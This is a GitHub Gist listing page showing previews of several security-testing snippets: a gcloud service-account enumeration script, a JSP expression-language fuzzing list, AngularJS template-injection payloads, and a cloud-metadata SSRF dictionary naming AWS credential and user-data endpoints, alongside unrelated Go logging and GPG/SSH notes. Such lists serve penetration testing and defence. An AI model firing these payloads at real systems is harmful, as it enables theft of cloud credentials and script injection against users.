Skip to content

Instantly share code, notes, and snippets.

Avatar

Andrew Luke Sw4mpf0x

View GitHub Profile
@carnal0wnage
carnal0wnage / gcp_enum.sh
Last active Dec 13, 2020
use the gcloud utilities to enumerate as much access as possible from a GCP service account json file. see blog post: <to insert>
View gcp_enum.sh
# gcloud auth activate-service-account --key-file=85.json
# gcloud projects list
project="my-project"
space=""
echo "gcloud auth list"
gcloud auth list
echo -e "$space"
View jsp-jstl-intruders.txt
${0 }
${0 == pageList.maxPage}
${1}
${1 eq currentPageNumber }
${5}
${5/6}
${a+1 }
${a.academyName}
${a.academyNumber}
${academyNumber==a.academyNumber}
@FrankSpierings
FrankSpierings / README.md
Last active Dec 26, 2020
Linux Container Escapes and Hardening
View README.md
@briangershon
briangershon / gist:fa9feb08e6a65d52bdc35c738d8cf104
Created Jan 8, 2017
Log Request Body for Debugging (golang)
View gist:fa9feb08e6a65d52bdc35c738d8cf104
buf, bodyErr := ioutil.ReadAll(r.Body)
if bodyErr != nil {
log.Print("bodyErr ", bodyErr.Error())
http.Error(w, bodyErr.Error(), http.StatusInternalServerError)
return
}
rdr1 := ioutil.NopCloser(bytes.NewBuffer(buf))
rdr2 := ioutil.NopCloser(bytes.NewBuffer(buf))
log.Printf("BODY: %q", rdr1)
@mccabe615
mccabe615 / AngularTI.md
Last active Jan 10, 2021
Angular Template Injection Payloads
View AngularTI.md

1.3.2 and below

{{7*7}}

'a'.constructor.fromCharCode=[].join;
'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';
@epixoip
epixoip / 8x1080.md
Last active Jan 8, 2021
8x Nvidia GTX 1080 Hashcat Benchmarks
View 8x1080.md
@BuffaloWill
BuffaloWill / cloud_metadata.txt
Last active Jan 25, 2021
Cloud Metadata Dictionary useful for SSRF Testing
View cloud_metadata.txt
## IPv6 Tests
http://[::ffff:169.254.169.254]
http://[0:0:0:0:0:ffff:169.254.169.254]
## AWS
# Amazon Web Services (No Header Required)
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
@andrewlkho
andrewlkho / gist:7373190
Last active Sep 28, 2020
How to use authentication subkeys in gpg for SSH public key authentication
View gist:7373190

GPG subkeys marked with the "authenticate" capability can be used for public key authentication with SSH. This is done using gpg-agent which, using the --enable-ssh-support option, can implement the agent protocol used by SSH.

Requirements

A working gpg2 setup is required. It may be possible to use gpg 1.4 but with gpg-agent compiled from gpg2. If you are using OS X 10.9 (Mavericks) then you may find the instructions [here][1] useful.